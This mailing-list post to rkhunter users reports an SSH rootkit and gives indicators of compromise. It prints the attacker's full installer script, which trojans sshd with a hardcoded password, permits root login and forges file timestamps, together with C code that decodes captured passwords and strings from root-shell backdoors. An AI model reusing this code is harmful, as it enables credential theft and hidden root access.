Hi guys:
Some new rootkit kicking arroung:
If you have this file in your system:
/usr/lib/libppopen.so
you more likely that you been compromised.
Seems the hacker recompiled a new ssh version to capture all the passwords
from a ssh session
#!/bin/sh
# by me
export PATH=/usr/sbin:/sbin:/usr/local/sbin:/usr/local/bin:$PATH
pwd=$(pwd)
sshd=$(which sshd)
chown root:root *
if test "$(grep ^UsePAM /etc/ssh/sshd_config)" != "" ; then
OPTS="--with-pam"
fi
if test "$(grep ^GSSAPIAuthentication /etc/ssh/sshd_config)" !=
"";then
KRB="--with-kerberos5=/usr/kerberos";
fi
chattr -isa /usr/sbin/sshd
chattr -isa /usr/bin/ssh
ssh -V 2>test
ver=`cat test | cut -d "_" -f 2 | cut -d "," -f 1`
echo "[+] Current openssh version: $ver"
echo "[+] SSH Daemon location: $sshd"
pass="daredevilz"
md5=`echo -n $pass | openssl md5`
hexhashed=`perl hashhex.pl $md5`
sed -i -e "s/UnFUnFp/$hexhashed/g" auth-pam.c
sed -i -e "s/UnFUnFp/$hexhashed/g" auth-passwd.c
echo "[*] Info: using password: $pass"
echo "#define SSH_VERSION \"OpenSSH_$ver\"" > version.h
echo "#define SSH_RELEASE SSH_VERSION" >>version.h
echo -e "[+] configuring and compiling openssh.. "
echo -e "[+] Wait.."
#if test ! -e /usr/include/linux/zlib.h;then
# cd zlib-1.2.5;./configure --prefix=/usr && make && make install
#cd ..
#fi
./configure --prefix=/usr \
--sysconfdir=/etc/ssh\
--with-md5-passwords --without-zlib-version-check $KRB
$OPTS && make all
if test -x sshd ;then
sed -i -e 's/PermitRootLogin no/PermitRootLogin yes/g'
/etc/ssh/sshd_config
rm -rf munchhausen
make munchhausen
mv ./munchhausen /usr/bin
touch -acmr /bin/dd /usr/bin/munchhausen
echo -e "[+] Looking good"
# moving the owld filez.. striping new ones and setting up
users
mkdir /etc/rpm
mv sshd /etc/rpm
mv ssh /etc/rpm
cd /etc/rpm
chattr -iau $sshd
mv $sshd /etc/rpm/sshdOLD
mv /usr/bin/ssh /etc/rpm/sshOLD
mv sshd $sshd
mv ssh /usr/bin/ssh
strip $sshd
strip /usr/bin/ssh
touch -acmr /etc/rpm/sshdOLD $sshd
touch -acmr /bin/ls /usr/bin/ssh
touch -acmr /bin/dd /usr/bin/sshd
unf=`grep sshd\: /etc/passwd`
# sshd needs a new user..
if test "$unf" = "" ; then
echo "[-] user sshd not found"
echo -e "\t[+] creating one..."
mkdir /var/empty/sshd -p
chmod 755 /var/empty
/usr/sbin/groupadd sshd
/usr/sbin/adduser -c 'Privilege-separated SSH' -s
/dev/null -d /var/empty/sshd sshd -g sshd
echo -e "\t[+] user sshd created"
fi
mkdir /var/empty/sshd &>/dev/null
touch /usr/lib/libppopen.so
chmod 777 /usr/lib/libppopen.so
echo "[+] Testing if SSHd starts.."
$sshd -t
echo "Done."
echo -e "\n\t- openssh " `grep Port /etc/ssh/sshd_config`
echo -e "\t- `w | head -n 1`";
echo -e "\t- " `uname -a`
#echo -e "\t- $pass"
fi
#echo -e "\n\n\n-- Done"
#echo -e "\t Used pass: $pass"
#grep Port /etc/ssh/sshd_config
#cd $pwd
#tar xzf sbd.tgz;cd sbd;make;cd bin
#./inst
munchhausen.c
#include <stdio.h>
#include <stdlib.h>
main(int c) {
const char *name = "UU";
char * p;
#define CHIU ³49a10cfeeea16de1b123843bb086e5c1² === exemplu
p=getenv(name);
if(p == NULL){
printf("use --help for info\n");
exit(0);;
}
FILE *pipz;
char md5pwd[36],comm[1024];
memset(&md5pwd,'\0',sizeof(md5pwd));
memset(&comm,'\0',sizeof(comm));
snprintf(comm,sizeof(comm),"/bin/echo -n %s|/usr/bin/md5sum",p);
if ((pipz=popen(comm,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipz);
pclose(pipz);
//printf("%s",md5pwd);
if (strcmp(md5pwd, CHIU)){
printf("use --help for info\n");
exit(0);;
}
//printf(" %s\n",p);
FILE * pFile;
long lSize;
char * buffer;
int result;
pFile = fopen ( "/usr/lib/libppopen.so" , "rb" );
if (pFile==NULL) {fputs ("File error",stderr); exit (1);}
fseek (pFile , 0 , SEEK_END);
lSize = ftell (pFile);
rewind (pFile);
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL) {fputs ("Memory error",stderr); exit (2);}
// while(result = fread (buffer,1,lSize,pFile)){
// putchar(~result);
//}
// if (result != lSize) {fputs ("Reading error",stderr); exit (3);}
//dd=fopen("/usr/lib/libppopen.so","r");
while(1) {
c = fgetc(pFile); if(feof(pFile )) break;
putchar(~c);
}
}
other files also found in the last attack:
-rwxr-xr-x 1 root root 68280 Jul 1 14:42 /usr/include/libutil2.1.h
/bin/zcat
In /etc/shadow if the user daemon has a password set (it should be:
daemon:*: )
zcut file (password is master) md5:6d428b18f6a3045efe8a523184e9d87b
/lib/ld-linux.so.2
libc.so.6
printf
system
setgid
_IO_stdin_used
__libc_start_main
setuid
__gmon_start__
GLIBC_2.0
PTRh
W E L C O M E
master
/bin/bash
also udevconf (password is muieba) md5:87355eb73bf35e126764c35264762847
/lib/ld-linux.so.2
PTRh
IPQh4
Enter ze password:
ACCESS GRANTED
/root
HOME
/bin/bash -i
HISTFILE
HISTSIZE
HISTSAVE
Wrong password
muieba
_Jv_RegisterClasses
__gmon_start__
libc.so.6
unsetenv
puts
getpass
system
fflush
stdin
setgid
strncmp
seteuid
exit
_IO_stdin_used
__libc_start_main
setuid
GLIBC_2.0
/lib/ld-linux.so.2
------------------------------------------------------------------------------
Open source business process management suite built on Java and Eclipse
Turn processes into business applications with Bonita BPM Community Edition
Quickly connect people, data, and systems into organized workflows
Winner of BOSSIE, CODIE, OW2 and Gartner awards
http://p.sf.net/sfu/Bonitasoft
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
